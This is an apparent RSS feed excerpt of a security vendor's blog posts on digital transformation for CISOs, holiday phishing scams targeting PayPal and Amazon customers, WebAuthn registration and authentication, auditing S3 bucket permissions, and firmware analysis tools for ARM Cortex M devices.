  • No need to go to the store - with voice recognition technology in your home, you can shop without even logging on to a computer
  • If you actually go to the store, ads and coupons pop up on your phone as you enter

Digital transformation is an evolution of business and organizational models to focus on fully leveraging evolving data analytics and pervasive technologies to deliver capabilities where and how the customer can best realize value.

An effective digital transformation can significantly improve a company’s speed to market and improve user productivity while delivering enhanced customer value. A digital transformation strategy doesn’t start with the end in mind; it’s a strategy that assumes continuous innovation and adaptation of products, services and delivery channels.

For new companies, the barrier to entry is very low as infrastructure as a service (IaaS) and platforms as a service (PaaS) enable very rapid deployment of new capabilities in the cloud. For those in a CISO or similar role, enabling your organization’s adoption of new business models and new technologies is the new norm, and is a base requirement for your role.

So what can CISOs do to enable their organizations to leverage the latest technology and business models of today? Invest in security platforms that are highly flexible and scalable. To compete today, collaboration needs to happen in real time from across the globe, and with individuals that may or may not be part of your organization. Security in such a fast-paced, innovative environment needs to just work, without substantial overhead and without user friction. Security solutions that interfere with rapid business development will be eliminated.

What are the properties of such security solutions? Here are some core required capabilities that will help enable your organization to innovate and be a leader, not a laggard.

  1. Cloud First - As rapid advances are more often cloud-based, your security platforms should be cloud-native.
  2. Integration - Delivering new capability is all about the integration of ideas, applications and data platforms that work from any device, anywhere in the world. Your security platforms need to be able to protect any application, anywhere, and feed intelligence to existing tools.
  3. Speed - With the barrier to entry being so low for new startups, time to market is more important than ever, so security solutions need to be able to move at the speed of business. Protecting a new SaaS application should take minutes, not weeks or months.
  4. Faster Value from Mergers and Acquisitions (M&A) - As organizations acquire new entities, how quickly the capabilities of those entities are leveraged by the acquirer often determines the perceived success or failure of that effort in the marketplace. Security tools should help drive faster value from M&A and not get in the way of realizing the desired benefits.
  5. Lower Cost - CISOs can’t afford to add solutions that increase demands on their staff or drive up cost for the organization. Security solutions need to be easy to adopt by users, and easy to manage by security teams. Tools that can’t lower TCO won’t survive.

“In the long history of humankind, those who learned to collaborate and improvise most effectively have prevailed.” - Charles Darwin

To survive and succeed in the age of information, organizations need to adapt faster than ever before and they need security and privacy platforms that can protect at the speed of business. CISOs, give your business leaders the gift of speed. Enable the rapid digital transformations necessary for business innovation and success with a security platform that moves as fast as they do.

]]>
<![CDATA[Holiday Phishing Campaigns Target PayPal & Amazon Customers]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/holiday-phishing-campaigns-target-paypal-and-amazon-customers https://duo.com/blog/holiday-phishing-campaigns-target-paypal-and-amazon-customers Industry News Tue, 05 Dec 2017 00:00:00 -0500

During this time of the year, holiday shopping can mean it’s harder for people to keep track of their online transactions and accounts - a disordered state of being that criminals are taking advantage of through phishing campaigns that target popular payment and ecommerce websites.

PayPal Phishing Campaign

A new phishing campaign has been recently found to target consumers via PayPal. The PayPal phishing email plays on the emotions of targets, creating a false sense of urgency by claiming that your recent transaction cannot be verified, as reported by MalwareBytes.

The email message claims to confirm that the user has changed their password, and says that PayPal noticed some changes to the user's selling activities that will require information verification. Once a user clicks on the link, they're led to a spoofed PayPal website, titled "Resolution Center," that asks for personal information, credit card numbers and extensive banking information.

[Image: spoofed PayPal identity verification page. Source: HackRead]

The scam goes even further, asking the user to upload documents to verify their identity, including a passport, identity card or driver’s license, according to HackRead. If you’re giving that much information away, it’ll be much harder to detect identity fraud right away - compared to a stolen credit card number, which can be potentially flagged and stopped by your bank.

If you're on Chrome, Google has already flagged the fake login link used in this scam as a potentially dangerous site. Check the browser address bar for the verified green signature (lock icon) to ensure the page is legitimate.

PayPal provides information on phishing and suspicious emails, and a way for people to report suspected fraud on their website.

Amazon Phishing Campaign

In November, the Better Business Bureau reported on a phishing scam that impersonated Amazon.com. The message claimed that Amazon could not confirm the address associated with the user's account.

[Image: Amazon phishing email. Source: BBB]

The message also stated that Amazon had disabled login access, and required action from the user to verify account information and re-enable access to their account - urging the user to click on the link in the email, which doesn’t lead to Amazon.com but rather a third-party site that could be hosting malware.

Amazon provides a security and privacy page on identifying emails or webpages from Amazon, as well as providing an email address to report suspicious URLs or emails - stop-spoofing@amazon.com. Check out the page linked above for instructions on how to do so.

Yet another Amazon phishing scam, reported on Twitter, was spotted urging customers to call into tech support.

What to Look Out For

Slow down and pay attention to email messages to avoid clicking on or giving away sensitive information. Beware of any urgent calls to action related to your transactions or account information - this type of messaging plays on the reactive emotional response of a user to get information from them quickly.

Don’t click on links within the email - type the website URL into your address bar manually or use a search engine to locate the webpage. Check for https:// and a verified lock icon in your address bar (but don’t use this as the single indicator of security, as this doesn’t always mean 100% assurance, as new phishing tactics from this summer have found).

Protecting Against Account Breaches and Malware

Aside from what to look out for, you can proactively protect against account breaches caused by phishing attempts by turning on two-factor authentication (also sometimes referred to as ‘two-step verification,’ ‘multi-factor authentication’ or ‘2FA’ for short) for all of your online accounts, especially any tied to your financial or personal information.

A second factor of authentication (preferably via an authentication method that isn’t SMS-based, if that’s an option) can stop criminals from logging into your account remotely using only a stolen password. Check out How to Add Two-Factor Authentication to Your Amazon Account With Duo Mobile.

In addition to protecting against unauthorized logins from stolen passwords, you can potentially better protect your devices against malware infection caused by clicking on links and visiting malicious websites by keeping your software up to date - that means running operating system, browser, plugin and other application updates as soon as they’re available. The more up to date your system is, the less likely it is you will be compromised by malware that seeks out weaknesses in old software to exploit.

]]>
<![CDATA[Web Authentication: What It Is and What It Means for Passwords]]> nsteele@duo.com(Nick Steele) https://duo.com/blog/web-authentication-what-it-is-and-what-it-means-for-passwords https://duo.com/blog/web-authentication-what-it-is-and-what-it-means-for-passwords Engineering Fri, 01 Dec 2017 08:30:00 -0500

Since mid 2016, a group of security professionals and researchers from across the industry have been working on a new way to handle authentication and proving one’s identity on the internet without the help of passwords.

WebAuthn and UAF

The new standard known as Web Authentication, or WebAuthn for short, is a credential management API that will be built directly into popular web browsers. It allows users to register and authenticate with web applications using an authenticator such as a phone, hardware security keys, or TPM (Trusted Platform Module) devices.

This means that with devices like a phone or a TPM, where a user can provide us with biometric verification, we can use WebAuthn to replace traditional passwords. Aside from user verification, we can also confirm ‘user presence.’ So if users have a U2F token like a Yubikey, we can handle that second factor of authentication through the WebAuthn API as well.

While WebAuthn is a fairly new spec, it is heavily based on a relatively old one, at least in “Internet years.” The FIDO Alliance began working on a similar API standard in 2014 called UAF, the Universal Authentication Framework. The specification for UAF fell short in some ways: it seems like there was never a real push to have the necessary functionality added to major browsers, so developers that wanted to implement it were tasked with working around that lack of native support.

On top of that, there was little reference for how to implement the steps to make UAF work properly on Android and iOS devices. At the time of publication, the best practical UAF reference was this implementation open-sourced by eBay.

Unlike its predecessor, WebAuthn should be here to stay. Although the fine points of the spec are complex, WebAuthn has been fairly easy to implement in practice. At the time of writing this, both Chrome and Firefox have the data types necessary for WebAuthn, and Firefox’s Nightly Build is able to create and request credentials. We’ll talk a bit later on about what this new standard could mean for the future of passwords (sorry, they’re probably not going away tomorrow), but first, a bit more about the core components of the WebAuthn API.

Registration and Authentication

While WebAuthn is drafted to be an open-ended credential creation and management API capable of making many different types of credentials, right now, it is written to handle registration and authentication to a web application. The credentials created through the WebAuthn API rely on strong cryptographic principles and asymmetric encryption. So when we talk about credential registration and authentication, know that the credentials we are using are actually public and private key pairs.

Registration

During registration, a user is creating a credential with an authenticator and then proving to the web application’s owner, called the relying party, that the credential and authenticator used to create it are trustworthy. Proving this allows the relying party to use the credential created in lieu of a conventional password in cases where there is user verification, and as a replacement for conventional U2F in cases where we can only prove user presence.

There are more than a few different cases for how WebAuthn would work in practice, but the most common example is this: A user visits a website, let’s say cat-facts.com, on their laptop and goes to register an account. After pressing a button to begin registration on the site, they receive a prompt on their phone saying “Register with cat-facts.com.”

Once they’ve accepted the request, the user would be asked to perform an “authorization gesture,” such as typing in a PIN or biometric action that is associated with the account they are creating. After providing this, the website on the laptop would display something to the effect of “Registration complete!”

The user can now log in to cat-facts.com using the same phone and authorization gesture.

[Image: UAF standards]

Authentication

Authentication, also known as assertion, since we are asserting the ownership of a credential, occurs after we have registered a credential with a website. Since the credential is just a keypair, the relying party can send some data to the user to verify their identity via the user’s authenticator. If they are who they say they are, the data will return signed by the credential private key. This action, in part, authenticates the user to the relying party.
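
At a high level, the relying party hands the browser a random challenge and then checks that the returned signature covers the authenticator data plus a hash of the client data. A stripped-down sketch of that check for a P-256 credential is below (using the Python cryptography library; a real implementation also validates the origin, RP ID hash, flags and signature counter):

    # Sketch: verify a WebAuthn assertion for a previously registered P-256
    # credential. Several required checks are omitted for brevity.
    import hashlib, json
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric import ec

    def verify_assertion(public_key: ec.EllipticCurvePublicKey,
                         expected_challenge: str,   # base64url, as issued
                         client_data_json: bytes,
                         authenticator_data: bytes,
                         signature: bytes) -> bool:
        client_data = json.loads(client_data_json)
        if client_data.get("type") != "webauthn.get":
            return False
        if client_data.get("challenge") != expected_challenge:
            return False  # wrong or reused challenge; rejects replays
        signed = authenticator_data + hashlib.sha256(client_data_json).digest()
        try:
            public_key.verify(signature, signed, ec.ECDSA(hashes.SHA256()))
            return True
        except Exception:
            return False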

Let’s consider a different scenario for how we can use WebAuthn to handle authentication after a user has registered with the site example.com. Let’s assume they’ve registered a second account as well and, to make things more interesting, that they are browsing on their phone. The user navigates to example.com on their phone and chooses the option to login. They are shown a list of their two accounts, choose one to log in to, and then they’re prompted to enter a PIN or biometric associated with the account. After this is given, example.com logs the user into the selected account.

Security Concerns

Most security issues lie with the implementation of the WebAuthn spec by developers. If a developer doesn’t take into account checking for things like replay attacks or making sure that the authenticator hasn’t been compromised in some way, then attacks are possible. Most concerns regarding the authenticator and manufacturer can be mitigated by diligence on the part of the developer.

What It Means for Passwords

The big thing that WebAuthn wants to provide is biometric multi-factor authentication based on “Something a user is.” A user (in most cases) has a voice, a fingerprint, or a retina, that is unique to them. Something most users also have nowadays is a biometric device, like a smartphone, that can use this data to create and manage credentials that only the user can access through these unique traits.

Since your phone is much better at making and storing passwords than you are, we can replace the standard website password using the WebAuthn spec. It is built with this in mind as its core feature, but currently only supports the physical method of two-factor authentication (“something a user has,” like a hardware security token), since no phones currently support WebAuthn.

This is not to say that WebAuthn cannot be used for the “something a user knows” authentication factor. It can (once the specification is implemented) do that too! Take, for example, a user entering a PIN instead of a biometric to authenticate with a website. This is something a user knows, but handled via the WebAuthn spec. Unlike WebAuthn’s predecessor, FIDO UAF, the spec allows for a lot more versatility.

Also unlike FIDO UAF, there are a lot of heavyweights supporting it, including Google, Microsoft and Mozilla. This makes me hopeful that this spec will actually begin to be adopted. A good sign of these companies actively being involved in WebAuthn’s development is that the spec already explains how it will integrate with Android Key Store and Android SafetyNet, and with Google engineers contributing to the spec draft, they’ll probably add support soon.

But Google has likely been thinking about this issue for a while now. In the beginning of 2017, Google began working on a specification for a credential manager API to handle credential storage. However, the only credentials discussed in this version of the credential manager are password and federated credentials. Google actually released documentation on using this credential management API in Chrome, and the same API is being modified (in Chrome) to include support for WebAuthn credentials.

So don’t start deleting your passwords yet, because WebAuthn still needs a bit of work. While it looks like the WebAuthn API should be available on Firefox and Chrome in the coming months, I don’t think we’ll see it replace passwords very soon. I do hope developers and companies start to implement it as a replacement for existing two-factor authentication code they may have in their site, because when phones begin to support WebAuthn requests, it should be quick to switch over support for user verification.

Examples and Further Reading

The Duo Labs team wrote a couple proof of concepts to both teach ourselves and help others see how WebAuthn should work in practice. After receiving some very helpful advice from J.C. Jones, one of the authors of the standard, I put together a bare bones web application written in Go that demonstrates the basics of Webauthn Registration and Authentication. The code is available to try out, currently only via the Firefox Nightly Build, at webauthn.io and the source code is available on GitHub if you want to run the code locally.

I hope to have another blog post available soon with a more technical look at the spec, but in the meantime, if you’re feeling excited and ready to take a deeper dive into WebAuthn, then I encourage people to check out the W3C working draft. If you have any questions, please reach out to me on Twitter or GitHub.

]]>
<![CDATA[Protecting Against S3 Cloud Storage Leaks With a New Approach]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/protecting-against-s3-cloud-storage-leaks-with-a-new-approach https://duo.com/blog/protecting-against-s3-cloud-storage-leaks-with-a-new-approach Industry News Thu, 30 Nov 2017 00:00:00 -0500

The misconfiguration of Amazon Web Services' (AWS) S3 (Amazon Simple Storage Service) buckets is a very common yet major error that can lead to the public exposure of large volumes of often highly-sensitive (and sometimes classified) data stored in a virtual environment. This isn’t a hack - it’s an internal IT infrastructure error that can leave data unprotected and available to anyone online.

Most recently, cloud security firm UpGuard reported the unprotected data and software of a Defense Department contractor - a more technical and detailed overview of the documents can be found in their blog post. The software was for a cloud-based intelligence distribution platform known as Red Disk, developed to deliver intel to troops in the field, according to Ars Technica. It was never fully deployed.

While the files couldn't be accessed without connecting to Pentagon systems, the data found on the virtual drive was highly sensitive, some of which was classified and concerning national security. The data also included private keys and hashed passwords for access to distributed intelligence systems that belonged to the federal agency’s third-party contractor's admins, as reported by Threatpost.

While UpGuard claims the immediate solution would be to update the S3 bucket's permission settings to only allow access to authorized admins, they also question how government agencies can keep track of their data security.
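
For organizations managing their own buckets, even a quick audit of ACL grants will surface the most obvious misconfigurations. A minimal sketch with boto3 (this only checks bucket ACLs; bucket policies deserve the same scrutiny):

    # Sketch: flag S3 buckets whose ACLs grant access to everyone.
    import boto3

    PUBLIC_GRANTEES = {
        "http://acs.amazonaws.com/groups/global/AllUsers",
        "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
    }

    s3 = boto3.client("s3")
    for bucket in s3.list_buckets()["Buckets"]:
        acl = s3.get_bucket_acl(Bucket=bucket["Name"])
        for grant in acl["Grants"]:
            if grant["Grantee"].get("URI") in PUBLIC_GRANTEES:
                print(f"{bucket['Name']}: public grant ({grant['Permission']})")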

But this is clearly not just an issue for the federal government - as other exposures of sensitive data online via S3 buckets have shown, affecting major mobile carriers, an entertainment company, a cable television provider, and so on. In September, I listed examples of half a dozen incidents that resulted in the exposure of cloud data in Securing Access to Data Stored in Amazon S3 Buckets.

A New Approach to Enterprise Security

These incidents demonstrate that gaining insight and control over how contractors access, maintain and house your data is essential to reduce the risk of data exposure. While this can be quite difficult for large organizations that often work either tangentially or closely with hundreds of contractors, keeping track of how sensitive (especially classified) data is accessed, and by who and what, should be first priority.

Enrolling your users and endpoints (devices like laptops, smartphones, PCs, etc.) into inventories; identifying endpoints as trusted using digital certificates and creating access policies based on the authenticated combination of user and endpoint are all steps to take in establishing a new framework for enterprise security, known as BeyondCorp.

Developed by Google, this allows an organization to enforce the same security policies, regardless of the location of the user, device or application. It's a zero-trust security model that ensures both the trust of the user and device before granting access to the applications and data. This model can also address risks posed by external, cloud-based applications that can face attacks that fall outside of traditional enterprise perimeter protections. While not a replacement for these traditional protections, it is a necessary enhancement.

Learn more about the security philosophy of BeyondCorp in Moving Beyond the Perimeter: Part 1, and how to implement the principles in your organization using Duo Beyond in Moving Beyond the Perimeter: Part 2.

]]>
<![CDATA[Examining Personal Protection Devices: Hardware and Firmware Research Methodology in Action]]> tmanning@duo.com(Todd Manning) https://duo.com/blog/examining-personal-protection-devices-hardware-and-firmware-research-methodology-in-action https://duo.com/blog/examining-personal-protection-devices-hardware-and-firmware-research-methodology-in-action Duo Labs Mon, 20 Nov 2017 08:30:00 -0500

In a technical paper released today, Duo Labs details research into two personal protection devices based on ARM Cortex M microcontrollers. Tools and techniques are shared, and a novel bypass affecting readback protection in one microcontroller is shown.

The explosion of the Internet of Things in recent years has resulted in the proliferation of microcontrollers into devices that impact many aspects of our daily lives. One such area Duo Labs investigated recently is the personal protection device category of consumer devices. These devices give wearers a simpler way to notify personal contacts during their daily lives. These notifications can represent a check-in to let people know, “I’m doing ok,” or to notify those contacts, “I’m in trouble and need help.” The personal protection device endeavors to let a wearer do this in a way that doesn’t require retrieving, unlocking, and operating a phone. Now, discrete devices can make this process faster and simpler.

Duo Labs researchers recently examined two personal protection devices based on ARM Cortex M microcontrollers. The two devices presented in the accompanying paper are the Revolar Instinct and the Athena by ROAR for Good. This paper describes a methodology for retrieving device firmware, and for loading firmware into IDA Pro, a common disassembler. This paper focuses on the disassembly of this firmware, and the discussion of a novel approach to defeating readback protection discovered in one ARM Cortex M implementation.

During the course of this research, I developed code for IDA Pro to assist in loading and grooming Cortex M firmware images. The IDAPython code comprises two modules. The first module annotates Cortex M vector tables, which gives IDA Pro hints about where code exists in the firmware image. The Cortex M module can automatically annotate firmware with a vector table located at the start of a firmware image, or can be tailored by the end user to work with relocated tables.
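
The underlying idea is simple even outside of IDA: a Cortex M image begins with a vector table whose first word is the initial stack pointer, followed by handler addresses with the low bit set to mark Thumb code. A standalone sketch of that parsing (plain Python for illustration, not the released IDAPython modules):

    # Sketch: list handler addresses from a Cortex M vector table at the
    # start of a raw firmware image.
    import struct

    def parse_vector_table(firmware: bytes, entries: int = 16) -> list:
        words = struct.unpack_from("<%dI" % entries, firmware, 0)
        initial_sp, handlers = words[0], words[1:]
        print("initial SP: 0x%08x" % initial_sp)
        # Handler entries point at Thumb code, so the low bit is set; clear it
        # to get the address a disassembler should mark as code.
        return [h & ~1 for h in handlers if h not in (0, 0xFFFFFFFF)]

    # Usage (path is a placeholder):
    # handlers = parse_vector_table(open("firmware.bin", "rb").read())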

The second module, called Amnesia, uses byte-level heuristics to detect ARM instructions in the firmware. Amnesia also contains heuristics that operate at the ARM instruction level to determine function boundaries based on common ARM function prologues and epilogues.

This code has been released on the Duo Labs Github, and its use is detailed in the accompanying paper.

]]>